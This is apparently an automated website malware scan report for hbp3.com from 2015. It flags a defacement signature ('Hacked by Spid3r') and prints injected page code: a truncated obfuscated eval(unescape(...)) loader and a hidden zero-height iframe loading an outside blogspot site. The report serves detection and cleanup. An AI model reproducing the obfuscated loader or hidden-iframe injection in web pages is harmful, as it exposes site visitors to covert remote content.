New scan:

Malware Scanner report for hbp3.com

Malicious/Suspicious/Total urls checked
0/2/2
2 pages have suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by Spid3r  (7 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://hbp3.com/
200 OK
Content-Length: 5860
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.


eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7
...[1075 bytes skipped]...

Decoded script:

...[1438 bytes skipped]...
e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35'));
<iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe>

Deface/Content modification. The following signature was found: Hacked by Spid3r

<head>
<title>Hacked by Spid3r</title>
<link rel="SHORTCUT ICON" type="image/x-icon" href="https://scontent-a-ams.xx.fbcdn.net/hphotos-prn2/t1.0-9/10320422_1392463094373475_56069615978506468_n.jpg">



<meta content='Hacked By Spider' name='description'/>
<meta content='Spid3r,Hacked By spider,Defaced by blackface team,spider Was Here,hacked' name='keywords'/>
<meta content='--Spider---' name='Auth
...[6881 bytes skipped]...


http://hbp3.com/test404page.js
200 OK
Content-Length: 5860
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.


eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7
...[1075 bytes skipped]...

Decoded script:

...[1438 bytes skipped]...
e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35'));
<iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hbp3.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 19:31:07 GMT
Server: nginx/1.8.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: hbp3.com
Referer: http://www.google.com/search?q=hbp3.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hbp3.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hbp3.com/

Result: hbp3.com is not infected or malware details are not published yet.